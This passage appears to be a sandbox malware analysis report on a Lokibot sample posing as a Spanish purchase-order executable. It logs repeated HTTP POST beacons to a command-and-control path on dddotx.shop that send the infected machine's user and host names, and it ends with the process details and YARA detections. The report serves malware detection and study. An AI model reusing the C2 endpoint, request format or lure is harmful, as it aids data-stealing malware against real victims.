                                      CF-RAY: 8d7adae38c226c3f-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      60192.168.2.550037188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:41.877525091 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:41.883239985 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:43.222179890 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:43 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2YVYdYvB9Cb13Q13HoijNG2JbuyfazCk4JFPV1kmQvpO4WkAxyOO4fPGDk1%2FdhjdpqKmDR8RuFr1%2FYbEOJ5OGNlBdhxGTptsYtOfKOQz%2B1jerauTyU3M%2F6Yx%2BWbaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adaea1916e77d-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2687&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      61192.168.2.550038188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:43.370507002 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:43.376183987 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:44.266699076 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:44 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2F8Dg55V4vzwndC76cyd2AQMgBj4YbWMhYIa4bISoMztEWeC6XGX%2FQHuUNT3i9qjO9bB3pH8GYDx251YciV8YC6K8PqR4qMI9eksE%2FtLBLOfRY%2BZdRGNvclnJKWi3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adaf36fff3aac-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      62192.168.2.550039188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:44.471126080 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:44.476667881 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:45.899514914 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:45 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arvzRh4D50zz0cGv9%2Fp%2B65cbO4r9XT4fD8aTYL0lC7SzW9RB66gozn8PE53drTYmJUetbJaDIWvGY%2BLR8BFosj%2B9QX%2BU1xUsMsoXmng%2B02C7nrK11RjLo1znHiXGCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adafa5bf06c28-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      63192.168.2.550040188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:46.075936079 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:46.083585024 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:49.446890116 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:49 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZpP48vVEFaoIJXmJweJdMcqvE32HQne95DJ4%2BpbCorqz19Rdm9FHDeKInDttE5ENIbtztiJFigyEfLTykX7Jo1yXON2Gd0nHrUYH%2BNusi6LJTXSuwysaIqIWt%2BbjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb045dfbe7df-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2058&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      64192.168.2.550041188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:49.599083900 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:49.605447054 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:51.258519888 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:51 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWa4g5hds29eH2hu8idLkFWYdOYJE7ClKfa96z%2BbHnfAUM5dtw2%2FzF%2FIn786%2BtGTFK6YsLkdO4XzbPVTXrxsDjLrDuDrP5LNm3Wpnsvk6rkNzY1ES3h2FITneWSmxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb1a5859e7aa-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      65192.168.2.550042188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:51.414366961 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:51.419744015 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:52.944350958 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:52 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mthHisWz0XpCVOYwRB6iqtkAod4n7LnHPrMwsnF5yo2DlqlDh7Bs4xkcBH4czccZXvNZ0CcLCGAWZmptILSpN0FCYwOP%2FaFRUv6KJCSqc61Q5NqSnrFlvmEs2WPqEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb25c9bfe9b1-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      66192.168.2.550043188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:53.086359978 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:53.091767073 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:56.758740902 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJfa1hiYNLN1jWlhq%2FqZLFUFkOHcKKD%2BBvBDW0pOAmL%2BE0YmUkcrXFRhmmU0vMUgyf41AvGxIGg2VsGSFPciVz64V5bKAlRPXC%2FHTK%2B5vheCwqvDaJ86kfO5R6KMwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb302dbaeb2f-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      67192.168.2.550044188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:56.911874056 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:56.917337894 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:58.361933947 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNqxsd1pUSYqptvMagBIhW9j9rA0LVQyajgvXmU2jWsUPUaK3UyzBM1MSPU10pBUhsnguEel%2FS9Lfc4Xly3DEE0pcm%2BUuqhbA6o4q54gk%2FlRlclmNknMuZ7mQICBFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb481d716b1d-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      68192.168.2.550045188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:58.507231951 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:58.513506889 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:04:03.634898901 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:04:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D69zyd2CmaCqyBI00eXhuBCNz1HQRQgyhCJkeShuBfNuQ5%2F8qpc%2BJxTm4qdwsSDjMBFgcuyIioTs7ci0fARwHieEMjUBmW8ebSZ7VKYMgUOaAIxPKxXFuW4oWC%2BaWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb521f52e9ca-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2231&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      69192.168.2.550046188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:04:03.801635981 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:04:03.807044029 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:04:04.695522070 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:04:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNYo7VG3OL66n7smhCPctkTkmvWh6szOKNrT0SGzHaDYrAQtqbk6QL4VfOyd1%2B1KQBnoGvzVNfKIVjtOFnSSmSQUZUXvrNbBTiMDWsEHpkTGvW7UQ9xDTiTMMtJuug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb731faa6b51-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      70192.168.2.550047188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:04:04.863425970 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:04:04.868949890 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:04:06.227567911 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:04:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTIu3Xa9n%2FRNYYgxgBO1owPFBvIZrGWUg%2BEKFWBmKougVFgHZuTwrvrC9AC974qF0bXnRV4%2FKnoCDwrAz73xAd0JYIvMBJ%2BcNFzbk6g%2FT%2BJuBlhngNIuWeh5LOLvzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb79cade474a-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      71192.168.2.550048188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:04:06.389303923 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:04:06.395714998 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:04:07.730067968 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:04:07 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMYPnjzitArtv%2BpXSPf1c%2BvhKrzavh9oSC5vxt8Vsn73nAzg48C%2B2Ug3GtAAwizAOLB%2Fq9FtaSU%2FBvVHyzyMJc%2FZ3parcBlPk0ijTuy8dVpp0hmRwkwEI7m18CrVmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7adb836f1fea0a-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:11:02:02
                                      Start date:24/10/2024
                                      Path:C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe"
                                      Imagebase:0xc40000
                                      File size:474'112 bytes
                                      MD5 hash:13A22D03A02D5BA40E7865B1595DB7A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
